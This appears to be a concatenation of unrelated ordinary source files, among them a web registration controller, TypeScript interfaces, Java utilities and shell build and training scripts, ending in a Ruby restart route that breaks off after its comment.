/* * This file is part of the \BlueLaTeX project. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ angular.module("bluelatex.User.Controllers.Register",['bluelatex.User.Services.User','reCAPTCHA']) .controller('RegisterController', [ '$rootScope', '$scope', 'UserService', '$location', '$log', 'MessagesService', 'reCAPTCHA', 'config', function ($rootScope, $scope, UserService, $location, $log, MessagesService, reCAPTCHA, config) { $scope.user = {}; $scope.requesting = false; reCAPTCHA.setOptions({ theme: 'clean' }); if(config.require_validation) { MessagesService.message('_Registration_Password_will_sent_in_email_'); } $scope.displayCaptcha = config.recaptcha_public_key != null; reCAPTCHA.setPublicKey(config.recaptcha_public_key); /** * Create a new user */ $scope.register = function () { $scope.requesting = true; if($scope.displayCaptcha) { $scope.user.recaptcha_response_field = reCAPTCHA.response(); $scope.user.recaptcha_challenge_field = reCAPTCHA.challenge(); } UserService.register($scope.user).then(function (data) { MessagesService.messageSession('_Registration_Success_'); if(config.require_validation) { MessagesService.messageSession('_Check_Mailbox_'); } UserService.getInfo({"name": $scope.user.username}).then(function (data) { $rootScope.loggedUser = data; $location.path("/"); }, function (err) { $location.path("/login"); }); }, function (err) { MessagesService.clear(); switch (err.status) { case 400: 
MessagesService.error('_Registration_Some_parameters_are_missing_',err); break; case 401: MessagesService.error('_Registration_The_captcha_did_not_verify_',err); break; case 409: MessagesService.error('_Registration_User_with_the_same_username_already_exists_',err); break; case 500: default: MessagesService.error('_Registration_Something_wrong_happened_',err); } }).finally(function() { $scope.requesting = false; }); }; } ]);
{-| Sum of the decimal digits of an integer.

    sumDigits 123 == 6

Generalized to negative inputs by summing the digits of the absolute
value (`sumDigits -45 == 9`); previously every non-positive input
collapsed to 0. Behavior for zero and positive inputs is unchanged.
-}
sumDigits : Int -> Int
sumDigits n =
    if n < 0 then
        sumDigits (negate n)
    else if n == 0 then
        0
    else
        rem n 10 + sumDigits (quot n 10)
#!/bin/bash
# Fine-tune and evaluate bert-base-uncased on the "ssc" task via run_glue.py,
# using GPUs 2-7 and 512-token sequences; overlong training sequences are
# filtered out (--filter_long_sequences_train) rather than truncated, hence
# the "notrunctrain" output directory name.
CUDA_VISIBLE_DEVICES=2,3,4,5,6,7 PYTHONPATH=.. python3 ../examples/run_glue.py \
    --task_name ssc \
    --do_train \
    --do_eval \
    --do_lower_case \
    --data_dir ~/data-eval \
    --model_type bert \
    --model_name_or_path bert-base-uncased \
    --max_seq_length 512 \
    --per_gpu_train_batch_size 128 \
    --per_gpu_eval_batch_size 128 \
    --filter_long_sequences_train \
    --learning_rate 2e-5 \
    --num_train_epochs 3.0 \
    --output_dir ~/eval/ssc-base-512-notrunctrain/
#!/bin/sh
# Remove conan-generated artifacts from the current directory.
unset IFS
set -euf

# `rm -f` already exits 0 when a file is missing, so the per-file
# `|| :` guards were redundant even under `set -e`; one call suffices.
rm -f conanbuildinfo.cmake graph_info.json conan.lock conanbuildinfo.txt conaninfo.txt
import { WithApolloClient } from 'react-apollo';

/** State for the back-to-top affordance. */
export interface IBackToTopState {
  displayBackToTop: boolean;
}

/** Props for the map view: a center point, zoom level and marker coordinates. */
export interface IPlacesProps {
  center: {
    lat: number;
    lng: number;
  };
  zoom: number;
  coordinates: any[];
}

export interface IPlaceIDObject {
  parentPlaceID: number;
  pathForward: string;
}

/** Props for the search component (Apollo client + router history). */
export interface ISearchProps {
  client: {
    query: ({ }) => {};
    writeQuery: ({ }) => {};
  };
  history: {
    push: ({ }) => {},
    location: {
      pathname: string,
    },
  };
}

export interface ISearchState {
  value: string;
  toggleCloseIcon: boolean;
  runningSearch: boolean;
  [key: string]: any;
}

/** Loose shape of DOM-like events handled by the search input. */
export interface EventObject {
  which?: number;
  target: {
    name: any,
    value: any,
  };
  clipboardData?: {
    getData(): any,
  };
  preventDefault(): any;
}

export interface ResponseObject {
  data: {
    searchResults: {
      results: object[],
    };
  };
}

export interface ClientObject {
  query: ({ }) => {};
  readQuery?: ({ }) => any;
}

export interface ISpinnerProps {
  disableTip?: boolean;
  size?: number;
}

export interface IImageCardProps {
  imageData: {
    primaryimageurl: string;
    title?: string;
  };
}

export interface CollectionsProps {
  query: ({ }) => {};
  readQuery: ({ }) => any;
}

export interface CollectionProps {
  match: {
    params: {
      id: number;
    };
  };
}

export type ICollectionsProps = WithApolloClient<CollectionsProps>;

export interface CollectionImages {
  id: string;
  primaryimageurl: string;
}

export interface CollectionResponse {
  object: {
    record: object;
  };
}

/** Arguments passed to Apollo's fetchMore for pagination. */
export interface FetchMore {
  query: ({ }) => {};
  variables: object;
  updateQuery: any;
}

export interface CollectionsFetchMore {
  fetchMoreResult: object;
}

export interface CollectionsFetchMoreResult {
  objects: {
    records: object[];
  };
  searchResults: {
    results: object[];
  };
}

/** Descriptor for an addEventListener registration on scroll. */
export interface ScrollEvent {
  type: string;
  listener: (event: Event) => void;
  options?: {
    capture?: boolean,
    passive?: boolean
  };
}

export interface CollectionDetail {
  id: string;
  text: string;
}

export interface ContextualText {
  context: string;
  text: string;
}

/** Generic string-keyed object. */
export interface ObjectInterface {
  [key: string]: any;
}

export interface FullImageViewValue {
  primaryimageurl: string;
}

/** A single collection record as rendered in grouped views. */
export interface CollectionGroupValue {
  title?: string;
  primaryimageurl?: string;
  accessionmethod?: string;
  accessionyear?: number;
  century?: number;
  classification?: string;
  contextualtext?: ContextualText[];
  [key: string]: any;
}

export interface PeopleInitials {
  personid: number;
  name: string;
}

/** A publication record from the Harvard Art Museums API. */
export interface PublicationData {
  title: string;
  publicationid: number;
  volumenumber: number;
  volumetitle: string;
  format: string;
  publicationplace: string;
  description: string;
  people: PeopleInitials[];
}

export interface PublicationsFetchMore {
  fetchMoreResult: object;
}

export interface PublicationsFetchMoreResult {
  publicationData: {
    publications: object[];
  };
}

export interface PublicationsQueryResponse {
  data: {
    publicationData: {
      publications: PublicationData[],
    },
  };
}

export interface INavbarState {
  isSideNavOpen: boolean;
}

export interface IPointerProps {
  text: string;
}

export interface IThemeProps {
  [key: string]: string;
}
import { black, blue, green, nameLabelCrop, purple, red, subtitleFifthCrop, subtitlePartialCrop, yellow } from '../constants'; import cv from 'opencv4nodejs'; import makeNameLabel from '../mainFunctions/makeNameLabel'; import { paintMat } from '../utils/utilityCv'; import subtitleFinder from './subtitleFinder'; const { innerX, innerY } = nameLabelCrop; const rectInnerNameLabel = new cv.Rect( innerX[0], innerY[0], innerX[1] - innerX[0], innerY[1] - innerY[0] ); const { rectX, rectY } = subtitlePartialCrop; const { rectX: rectXF, rectY: rectYF } = subtitleFifthCrop; const subtitleRect = new cv.Rect( rectX[0], rectY[0], rectX[1] - rectX[0], rectY[1] - rectY[0] ); const subtitleRectFifth = new cv.Rect( rectXF[0], rectYF[0], rectXF[1] - rectXF[0], rectYF[1] - rectYF[0] ); const prevSubtitleRect = new cv.Rect( rectX[0], rectY[0] - 200, rectX[1] - rectX[0], rectY[1] - rectY[0] ); const diffSubtitleRect = new cv.Rect( rectX[0], rectY[0] - 400, rectX[1] - rectX[0], rectY[1] - rectY[0] ); const diffSubtitleRect2 = new cv.Rect( rectX[0], rectY[0] - 600, rectX[1] - rectX[0], rectY[1] - rectY[0] ); function subTractBorder(mat) { const contours = mat.findContours(cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE); const copy = mat.copy(); copy.drawContours( contours.map(item => item.getPoints()), -1, black, 1, cv.LINE_8 ); return copy; } export default function nameLabelGenerator(mat, vCap) { const { status, currentActor: { actor }, percentDiff } = makeNameLabel(mat); // eslint-disable-next-line no-console console.log('percentDiff: ', percentDiff); if (status) { const dialogMat = subtitleFinder(mat, vCap); // matSubtitle, prevMatSubtitle // eslint-disable-next-line no-console console.log({ dialog: dialogMat.matSubtitle.countNonZero(), actor }); paintMat(mat, actor, rectInnerNameLabel, blue); paintMat(mat, dialogMat.matSubtitle, subtitleRect, red); paintMat(mat, dialogMat.fifthMatSubtitle, subtitleRectFifth, green, 100); if (dialogMat.prevMatSubtitle) { paintMat( mat, 
dialogMat.prevMatSubtitle, prevSubtitleRect, yellow, null, dialogMat.prevMatSubtitle.countNonZero() ); const nextBordered = subTractBorder(dialogMat.prevMatSubtitle); const sub = nextBordered.sub(dialogMat.matSubtitle); paintMat(mat, sub, diffSubtitleRect, blue, null, sub.countNonZero()); // const revSub = dialogMat.matSubtitle.sub(dialogMat.prevMatSubtitle); paintMat( mat, nextBordered, diffSubtitleRect2, purple, null, nextBordered.countNonZero() ); } return mat; } return mat; }
import { Injectable } from '@angular/core'; import { HttpClient } from '@angular/common/http'; import { environment } from '../../environments/environment'; import { IGetNewsAuthorsResponse, IGetNewsResponse } from '../core/news'; @Injectable({ providedIn: 'root' }) export class NewsService { //#region Lifecycle constructor(private http: HttpClient) { } //#endregion //#region Commands getNewsAuthors() { return this.http.get<IGetNewsAuthorsResponse>( `${environment.apiHost}/v1/news/authors` ); } async getNewsAuthorsAsync() { return this.getNewsAuthors().toPromise(); } getNews() { return this.http.get<IGetNewsResponse>( `${environment.apiHost}/v1/news` ); } async getNewsAsync() { return this.getNews().toPromise(); } //#endregion }
<filename>chest/base-utils/math/src/main/java/net/community/chest/math/functions/eval/PositionalArgumentPropertyAccessor.java<gh_stars>1-10 /* * */ package net.community.chest.math.functions.eval; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import net.community.chest.resources.PropertyAccessor; /** * <P>Copyright GPLv2</P> * * @author <NAME>. * @since May 27, 2009 3:30:39 PM */ public class PositionalArgumentPropertyAccessor extends ArrayList<Number> implements PropertyAccessor<String,Number> { /** * */ private static final long serialVersionUID = -8479003120539033189L; public PositionalArgumentPropertyAccessor () { super(); } public PositionalArgumentPropertyAccessor (Collection<? extends Number> c) { super(c); } public PositionalArgumentPropertyAccessor (int initialCapacity) { super(initialCapacity); } public PositionalArgumentPropertyAccessor (Number ... nums) { this(((null == nums) || (nums.length <= 0)) ? 10 : nums.length); if ((nums != null) && (nums.length > 0)) addAll(Arrays.asList(nums)); } /* * @see net.community.chest.resources.PropertyAccessor#getProperty(java.lang.Object) */ @Override public Number getProperty (String key) { if ((null == key) || (key.length() <= 0)) return null; final Integer nIndex=Integer.decode(key); return get(nIndex.intValue()); } }
<gh_stars>100-1000 import click from virl.api import VIRLServer, ViewerPlugin, NoPluginError from virl.cli.views import node_def_list_table from virl.helpers import get_cml_client @click.command() @click.option("--node", default=None) def ls(**kwargs): """ list all node definitions or the details of a specific node definition """ node = kwargs.get("node") server = VIRLServer() client = get_cml_client(server) pl = None # Regardless of the argument, we have to get all the node definitions # In the case of no arg, we print them all. # In the case of an arg, we have to go back and get details. defs = client.definitions.node_definitions() try: pl = ViewerPlugin(viewer="node_def") except NoPluginError: pass if node: for f in list(defs): if f["id"] == node: if pl: pl.visualize(node_defs=[f]) else: node_def_list_table([f]) break else: if pl: pl.visualize(node_defs=defs) else: node_def_list_table(defs)
def flatten(lst):
    """Recursively flatten an arbitrarily nested list.

    Args:
        lst: A list whose items may themselves be (nested) lists.

    Returns:
        A new flat list containing every non-list item of ``lst`` in
        left-to-right order. The input list is not modified.
    """
    flat_list = []
    for item in lst:
        # Use isinstance rather than `type(item) is list` so that list
        # subclasses are flattened too; recurse into nested lists.
        if isinstance(item, list):
            flat_list.extend(flatten(item))
        else:
            flat_list.append(item)
    return flat_list


# Sample
nested_list = [[1, 2, [3]], 4]
flat_list = flatten(nested_list)
print(flat_list)
# Output: [1, 2, 3, 4]
<gh_stars>10-100
/**
 *
 */
package jframe.core.plugin;

/**
 * A session grouping a set of plugins together.
 * <p>
 * <li>Broadcasts messages to the plugins in the group</li>
 * <li>Manages the lifecycle of a group of plugins</li>
 * </p>
 *
 * @author dzh
 * @date Sep 13, 2013 1:29:18 AM
 * @since 1.0
 */
public interface PluginSession {

}
package org.prime.graphql.mutation; import com.coxautodev.graphql.tools.GraphQLMutationResolver; import graphql.GraphQLException; import graphql.schema.DataFetchingEnvironment; import org.prime.graphql.model.AuthData; import org.prime.graphql.model.User; import org.prime.graphql.repository.UserRepository; import org.prime.graphql.resolver.SigninPayload; import org.prime.graphql.security.jwt.JwtTokenUtil; import org.prime.graphql.security.jwt.JwtUserDetailsService; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.security.authentication.UsernamePasswordAuthenticationToken; import org.springframework.security.core.Authentication; import org.springframework.security.core.context.SecurityContextHolder; import org.springframework.security.core.userdetails.UserDetails; import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder; public class Mutation implements GraphQLMutationResolver{ // NOT AUTOWIRED HERE IT"S NOT WORKING private JwtTokenUtil jwtTokenUtil; private JwtUserDetailsService userDetailsService; private final UserRepository userRepository; private final Logger logger = LoggerFactory.getLogger(this.getClass()); public Mutation(UserRepository userRepository, JwtTokenUtil jwtTokenUtil, JwtUserDetailsService userDetailsService) { this.userRepository = userRepository; this.jwtTokenUtil = jwtTokenUtil; this.userDetailsService = userDetailsService; } public SigninPayload signinUser(AuthData auth, DataFetchingEnvironment env){ User user = userRepository.findByUsername(auth.getUsername()).get(); BCryptPasswordEncoder encoder = new BCryptPasswordEncoder(); if (encoder.matches(auth.getPassword(), user.getPassword())) { logger.info("match"); UserDetails userDetails = userDetailsService.loadUserByUsername(auth.getUsername()); logger.info("userdetails: {}", userDetails); Authentication authentication = new UsernamePasswordAuthenticationToken(auth.getUsername(), auth.getPassword(), userDetails.getAuthorities()); 
logger.info("authentication: {}", authentication); SecurityContextHolder.getContext().setAuthentication(authentication); //context.getRequest().get().getSession(true).setAttribute("SPRING_SECURITY_CONTEXT", SecurityContextHolder.getContext()); logger.info("context is ready"); return new SigninPayload(jwtTokenUtil.generateToken(user.getUsername()), user); } throw new GraphQLException("Invalid credentials"); } }
#!/usr/bin/env bash
# SLURM batch script: trains a detection model on the
# bdd_peds+HP18k_remap_cityscape_hist dataset with a distillation config.
#SBATCH --job-name=bdd_source_and_HP18k_remap_cityscapes_hist
#SBATCH -o gypsum/logs/%j_bdd_source_and_HP18k_remap_cityscapes_hist.txt
#SBATCH -e gypsum/errs/%j_bdd_source_and_HP18k_remap_cityscapes_hist.txt
#SBATCH -p 1080ti-long
#SBATCH --gres=gpu:4
#SBATCH --mem=100000
##SBATCH --cpus-per-task=4
##SBATCH --mem-per-cpu=4096

# NOTE(review): 4 GPUs are requested above (--gres=gpu:4) yet only device 3
# is exposed here and NUM_GPUS is set to 1 below — confirm this is intentional.
export CUDA_VISIBLE_DEVICES=3

# Train with an effective batch accumulated over 2 iterations, snapshotting
# every 5000 iters, starting from the pretrained bdd_peds checkpoint.
python tools/train_net_step.py \
    --dataset bdd_peds+HP18k_remap_cityscape_hist \
    --cfg configs/baselines/bdd_distill100.yaml \
    --set NUM_GPUS 1 TRAIN.SNAPSHOT_ITERS 5000 \
    --iter_size 2 \
    --use_tfboard \
    --load_ckpt /mnt/nfs/scratch1/pchakrabarty/bdd_recs/ped_models/bdd_peds.pth \
<reponame>siyingpoof/main package seedu.address.ui; import java.util.Optional; import org.junit.Rule; import guitests.GuiRobot; import guitests.guihandles.exceptions.NodeNotFoundException; import javafx.scene.Node; import seedu.address.ui.testutil.UiPartRule; /** * A GUI unit test class for DocX. */ public abstract class GuiUnitTest { @Rule public final UiPartRule uiPartRule = new UiPartRule(); protected final GuiRobot guiRobot = new GuiRobot(); /** * Retrieves the {@code query} node owned by the {@code rootNode}. * * @param query name of the CSS selector of the node to retrieve. * @throws NodeNotFoundException if no such node exists. */ protected <T extends Node> T getChildNode(Node rootNode, String query) { Optional<T> node = guiRobot.from(rootNode).lookup(query).tryQuery(); return node.orElseThrow(NodeNotFoundException::new); } }
/**
 * Returns the element of `arrayOfObjects` with the largest `count` property.
 * Ties are resolved in favor of the later element (preserving the original
 * `>=` comparison). Returns `undefined` for an empty array.
 *
 * @param {Array<{count: number}>} arrayOfObjects - objects with a numeric `count`.
 * @returns {Object|undefined} the object with the greatest `count`, or undefined.
 */
function largestObject(arrayOfObjects) {
  let maxObj;
  for (let i = 0; i < arrayOfObjects.length; i++) {
    // BUG FIX: the original seeded `max = 0`, which returned undefined
    // whenever every count was negative. Seed from the first element instead.
    if (maxObj === undefined || arrayOfObjects[i].count >= maxObj.count) {
      maxObj = arrayOfObjects[i];
    }
  }
  return maxObj;
}
import java.io.PrintStream;
import java.util.List;

/**
 * Command that prints a listing of library books to the configured stream.
 * The command parameter selects which subset to list: "all", "available",
 * or "checkedOut"; anything else prints an error message.
 */
public class ListCommand extends Command {

    // Library queried for the book lists; supplied by the caller.
    private Library library;

    /**
     * @param listKinds   the command parameter selecting which books to list
     * @param printStream destination stream for the listing output
     * @param library     library to query for books
     */
    public ListCommand(String listKinds, PrintStream printStream, Library library) {
        super(listKinds, printStream);
        this.library = library;
    }

    /**
     * Resolves the command parameter to a book list and prints each book
     * as "title - author", one per line. Prints an error and returns early
     * on an unrecognized parameter.
     */
    @Override
    public void execute() {
        List<Book> booksToPrint;
        switch (getCommandParameter()) {
            case "all":
                booksToPrint = library.getAllBooks();
                break;
            case "available":
                booksToPrint = library.getAvailableBooks();
                break;
            case "checkedOut":
                booksToPrint = library.getCheckedOutBooks();
                break;
            default:
                getPrintStream().println("Invalid listKinds parameter");
                return;
        }
        for (Book book : booksToPrint) {
            getPrintStream().println(book.getTitle() + " - " + book.getAuthor());
        }
    }
}
#!/bin/sh
# Bootstrap a local development environment: create a `venv` virtualenv,
# upgrade pip inside it, and install the development requirements.
# Each step only runs if the previous one succeeded.
python3 -m venv venv && venv/bin/pip install -U pip && venv/bin/pip install -r requirements-dev.txt
0=${(%):-%x} @echo "=== ${0:t:r} ===" autoload -Uz ${0:a:h}/functions/setup && setup source $PRJ_HOME/antidote.zsh repo="ohmyzsh/ohmyzsh" antidote path $repo &>/dev/null @test "'antidote path' fails when a bundle doesn't exist" $? -ne 0 expected="antidote: error: $repo does not exist in cloned paths" actual=$(antidote path $repo 2>&1) @test "'antidote path' fails with the expected message" "$expected" = "$actual" # mock so we don't actually clone a repo function _antidote_gitclone { _mock_gitclone "$@" } # we need to redirect fd3 to somewhere when we mock cloning # Also, we aren't testing 'antidote bundle' here - we already have tests for that. # For this, we just need it to mock-clone so we can test the path command 3>/dev/null antidote bundle $repo &>/dev/null @test "antidote bundle succeeded" $? -eq 0 antidote path $repo &>/dev/null @test "'antidote path' succeeds when a bundle exists" $? -eq 0 expected="$ANTIDOTE_HOME/https-COLON--SLASH--SLASH-github.com-SLASH-ohmyzsh-SLASH-ohmyzsh" actual=$(antidote path $repo 2>&1) @test "'antidote path' succeeds with the expected path output" "$expected" = "$actual" teardown
package com.artist.web.bookstore;

import android.app.Application;

import com.artist.web.bookstore.network.ApiManager;

/**
 * Application subclass that obtains the process-wide {@link ApiManager}
 * instance at startup and exposes it through a static field for the rest
 * of the app to use.
 */
public class LaunchApplication extends Application {

    // Process-wide API manager; assigned once in onCreate() before any
    // activity runs, so readers can assume it is non-null afterwards.
    public static ApiManager sApiManager;

    @Override
    public void onCreate() {
        super.onCreate();
        sApiManager = ApiManager.getInstance();
    }
}
#!/bin/bash
# Download, build and install Boost 1.68.0 (program_options only) into
# ./boost_1_68_0/installed (64-bit) and ./boost_1_68_0/installed32 (32-bit),
# as static, -fPIC libraries.

# BUG FIX: the original used `curdir=$pwd`, which expands the (normally
# unset) lowercase shell variable `pwd` and left curdir empty, so the final
# `cd $curdir` silently changed to $HOME. Use command substitution instead.
curdir=$(pwd)
mydir="${0%/*}"
cd "$mydir" || exit 1

# TODO: add progress bar, -q is quiet, if removing it the progress bar is in
# multiple lines
echo "downloading boost"
wget -q https://dl.bintray.com/boostorg/release/1.68.0/source/boost_1_68_0.tar.gz
echo "unzipping boost"
tar xzvf boost_1_68_0.tar.gz >> /dev/null
echo "installing boost"
cd boost_1_68_0 || exit 1
mkdir installed
./bootstrap.sh --prefix=`pwd`/installed --with-libraries=program_options >> /dev/null ; ./b2 cxxflags=-fPIC link=static install >> /dev/null
mkdir installed32
./bootstrap.sh --prefix=`pwd`/installed32 --with-libraries=program_options >> /dev/null ; ./b2 cxxflags=-fPIC link=static install address-model=32 >> /dev/null
cd "$curdir" || exit 1
#!/bin/bash device=2,3 batch_size=256 noise_type=dropout data=cifar10 n_ensemble=1 for levels in 1 2 3 4 5 do for sigma in 0.5 do test_sigma=0.0 echo "nonadv testing" "sigma =" ${sigma} "test_sigma =" ${test_sigma} echo "level = " ${levels} ckpt_f=./ckpt/sde_${data}_${sigma}_${noise_type}.pth CUDA_VISIBLE_DEVICES=${device} python nonadv_evaluation.py \ --data $data \ --batch_size $batch_size \ --levels $levels \ --ckpt $ckpt_f \ --sigma $sigma \ --test_sigma $test_sigma \ --noise_type $noise_type \ --n_ensemble $n_ensemble \ > >(tee ./results/nonadv_acc/nonadv_acc_sde_${data}_train\=${sigma}_test\=${sigma}_${noise_type}.txt) #device=$((device+1)) done done
package org.nikkii.alertify4j.util;

import java.util.NoSuchElementException;

/*
 * Copyright (c) 2012, 2013, Oracle and/or its affiliates. All rights reserved.
 * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
 */

/**
 * A container object which may or may not contain a non-null value. If a value is present, {@code isPresent()} will
 * return {@code true} and {@code get()} will return the value.
 */
public final class Optional<T> {

    /**
     * Common instance for {@code empty()}.
     */
    private static final Optional<?> EMPTY = new Optional<Object>();

    /**
     * Returns an empty optional instance. No value is present for this Optional.
     * @param <T> Type of the non-existent value
     * @return An empty optional.
     */
    @SuppressWarnings("unchecked")
    public static <T> Optional<T> empty() {
        return (Optional<T>) EMPTY;
    }

    /**
     * Returns an optional with the specified present non-null value.
     * @param value The value to be present, which must be non-null.
     * @return An optional with the value present.
     * @throws NullPointerException If value is null.
     */
    public static <T> Optional<T> of(T value) {
        return new Optional<T>(value);
    }

    /**
     * Returns an optional describing the specified value, if non-null, otherwise returns an empty optional.
     * @param value The possibly-null value to describe.
     * @return An optional with a present value if the specified value is non-null, otherwise an empty optional.
     */
    @SuppressWarnings("unchecked")
    public static <T> Optional<T> ofNullable(T value) {
        return (Optional<T>) (value == null ? empty() : of(value));
    }

    /**
     * If non-null, the value; if null, indicates no value is present
     */
    private final T value;

    /**
     * Creates a new empty optional.
     */
    private Optional() {
        this.value = null;
    }

    /**
     * Creates the optional with the specified non-null value.
     * @param value The non-null value.
     * @throws NullPointerException If the value is null.
     */
    private Optional(T value) {
        // BUG FIX: the Javadoc (here and on of()) promises NullPointerException
        // for a null value, but the original threw IllegalArgumentException.
        if (value == null) {
            throw new NullPointerException("Value cannot be null.");
        }
        this.value = value;
    }

    @Override
    public boolean equals(Object obj) {
        if (this == obj) {
            return true;
        }
        if (!(obj instanceof Optional)) {
            return false;
        }
        Optional<?> other = (Optional<?>) obj;
        if (value == null && other.value == null) {
            return true;
        }
        return value != null && value.equals(other.value);
    }

    /**
     * Returns the value of this optional.
     * @return The non-null value held by this optional.
     * @throws NoSuchElementException If there is no value present.
     */
    public T get() {
        if (value == null) {
            throw new NoSuchElementException("No value present.");
        }
        return value;
    }

    @Override
    public int hashCode() {
        return value == null ? 0 : value.hashCode();
    }

    /**
     * Return {@code true} if there is a value present, otherwise {@code false}.
     * @return {@code true} if there is a value present, otherwise {@code false}
     */
    public boolean isPresent() {
        return value != null;
    }

    /**
     * Return the value if present, otherwise return {@code other}.
     * @param other the value to be returned if there is no value present, may be null
     * @return the value, if present, otherwise {@code other}
     */
    public T orElse(T other) {
        return value != null ? value : other;
    }

    @Override
    public String toString() {
        return value != null ? "Optional: value=" + value + "." : "Optional.empty";
    }
}
package com.foxconn.iot.core.repository; import org.springframework.data.domain.Page; import org.springframework.data.domain.Pageable; import org.springframework.data.jpa.repository.JpaRepository; import org.springframework.data.jpa.repository.Modifying; import org.springframework.data.jpa.repository.Query; import org.springframework.data.repository.query.Param; import com.foxconn.iot.core.entity.ClientVersion; public interface ClientVersionRepository extends JpaRepository<ClientVersion, Long> { ClientVersion findById(long id); @Modifying @Query(value = "update ClientVersion a set a.status=:status where a.id=:id") void updateStatusById(@Param("status") int status, @Param("id") long id); @Modifying @Query(value = "update ClientVersion a set a.publish=:publish where a.id=:id") void updatePublishById(@Param("publish") int publish, @Param("id") long id); @Query(value="select a from ClientVersion a where a.client.id=:clientId") Page<ClientVersion> queryByClientId(@Param("clientId") long clientId, Pageable pageable); }
import pprint


def process_peers(omp_peers: list, json: bool) -> None:
    """Display the given OMP peers.

    Args:
        omp_peers: List of peer entries to display.
        json: When True, pretty-print the whole list with a 2-space indent;
            when False, emit each peer on its own line.
    """
    if not json:
        # Plain mode: one peer per line.
        for entry in omp_peers:
            print(entry)  # Placeholder action, replace with the actual action
        return

    # Structured mode: pretty-print the full list.
    printer = pprint.PrettyPrinter(indent=2)
    printer.pprint(omp_peers)
package com.objectway.stage.converter; import java.util.ArrayList; import java.util.List; import com.objectway.stage.model.AccountServiceBean; import com.objectway.stage.model.TransactionServiceBean; import com.objectway.stage.viewbeans.AccountViewBean; import com.objectway.stage.viewbeans.TransactionViewBean; public class TransactionViewConverter implements ServiceViewConverter<TransactionServiceBean, TransactionViewBean>{ private static final ServiceViewConverter<AccountServiceBean, AccountViewBean> contoCorrenteViewConverter = new AccountViewConverter(); @Override public TransactionServiceBean viewToService(TransactionViewBean tv) { TransactionServiceBean ts = new TransactionServiceBean(); ts.setAmount(tv.getAmount()); ts.setDeposit(tv.isDeposit()); ts.setDateIns(tv.getDateIns()); ts.setAccount(contoCorrenteViewConverter.viewToService(tv.getAccount())); return ts; } @Override public TransactionViewBean serviceToView(TransactionServiceBean ts) { TransactionViewBean tv = new TransactionViewBean(); tv.setAmount(ts.getAmount()); tv.setDeposit(ts.isDeposit()); tv.setDateIns(ts.getDateIns()); tv.setAccount(contoCorrenteViewConverter.serviceToView(ts.getAccount())); return tv; } @Override public List<TransactionServiceBean> viewListToServiceList(List<TransactionViewBean> tvl) { List<TransactionServiceBean> tsl = new ArrayList<>(); tvl.forEach(tv -> tsl.add(viewToService(tv))); return tsl; } @Override public List<TransactionViewBean> serviceListToViewList(List<TransactionServiceBean> tsl) { List<TransactionViewBean> tvl = new ArrayList<>(); tsl.forEach(ts -> tvl.add(serviceToView(ts))); return tvl; } }
#!/bin/bash ############################################################### # -p <producing nodes count> # -n <total nodes> # -s <topology> # -d <delay between nodes startup> ############################################################### pnodes=10 topo=star delay=0 args=`getopt p:n:s:d: $*` if [ $? == 0 ]; then set -- $args for i; do case "$i" in -p) pnodes=$2; shift; shift;; -n) total_nodes=$2; shift; shift;; -d) delay=$2; shift; shift;; -s) topo="$2"; shift; shift;; --) shift; break;; esac done else echo "huh we got err $?" if [ -n "$1" ]; then pnodes=$1 if [ -n "$2" ]; then topo=$2 if [ -n "$3" ]; then total_nodes=$3 fi fi fi fi total_nodes="${total_nodes:-`echo $pnodes`}" rm -rf tn_data_* if [ "$delay" == 0 ]; then programs/launcher/launcher -p $pnodes -n $total_nodes -s $topo else programs/launcher/launcher -p $pnodes -n $total_nodes -s $topo -d $delay fi sleep 7 echo "start" > test.out port=8888 endport=`expr $port + $total_nodes` echo endport = $endport while [ $port -ne $endport ]; do programs/eosc/eosc --port $port get block 1 >> test.out 2>&1; port=`expr $port + 1` done grep 'producer"' test.out | tee summary | sort -u -k2 | tee unique prodsfound=`wc -l < unique` lines=`wc -l < summary` if [ $lines -eq $total_nodes -a $prodsfound -eq 1 ]; then echo all synced programs/launcher/launcher -k 15 exit fi echo $lines reports out of $total_nodes and prods = $prodsfound sleep 18 programs/eosc/eosc --port 8888 get block 5 sleep 15 programs/eosc/eosc --port 8888 get block 10 sleep 15 programs/eosc/eosc --port 8888 get block 15 sleep 15 programs/eosc/eosc --port 8888 get block 20 sleep 15 echo "pass 2" > test.out port=8888 while [ $port -ne $endport ]; do programs/eosc/eosc --port $port get block 1 >> test.out 2>&1; port=`expr $port + 1` done grep 'producer"' test.out | tee summary | sort -u -k2 | tee unique prodsfound=`wc -l < unique` lines=`wc -l < summary` if [ $lines -eq $total_nodes -a $prodsfound -eq 1 ]; then echo all synced programs/launcher/launcher -k 15 
exit fi echo ERROR: $lines reports out of $total_nodes and prods = $prodsfound programs/launcher/launcher -k 15 echo ================================================================= echo Contents of tn_data_00/config.ini: cat tn_data_00/config.ini echo ================================================================= echo Contents of tn_data_00/stderr.txt: cat tn_data_00/stderr.txt exit 1
import React from 'react'; import PropTypes from 'prop-types'; import Share from 'react-native-share'; import TouchableOpacity from '~/components/TouchableOpacity' import Icon from 'react-native-vector-icons/FontAwesome'; import { scale, colors } from '~/configs/styles'; class ShareButton extends React.PureComponent { static displayName = "@ShareButton"; static propTypes = { title: PropTypes.string, description: PropTypes.string, link: PropTypes.string.isRequired, emailCC: PropTypes.oneOfType([ PropTypes.array, PropTypes.string ]), emailBody: PropTypes.string, emailSubject: PropTypes.string }; render() { const { title, description: message, link: url, emailCC, emailBody, emailSubject: subject, iconStyle, onPress, ...otherProps } = this.props; return ( <TouchableOpacity {...otherProps} onPress={(e) => { onPress && onPress(e); Share.open({ url, message, title, subject, failOnCancel: true }); }} > <Icon name = 'share-alt' style = {iconStyle || _styles.icon} /> </TouchableOpacity> ); } } const _styles = { icon: { fontSize: scale(20), color: colors.text.normal } }; export default ShareButton;
<reponame>carlosjhr64/mdserver<filename>plug/restart.rb
module Markita
  class Base
    # GET /restart.html — restarts the server by re-exec'ing the current
    # process ($0 with the original ARGV) from a background thread after a
    # one-second delay, giving this response time to be delivered first.
    # Responds with a small HTML page echoing the command being re-run.
    get '/restart.html' do
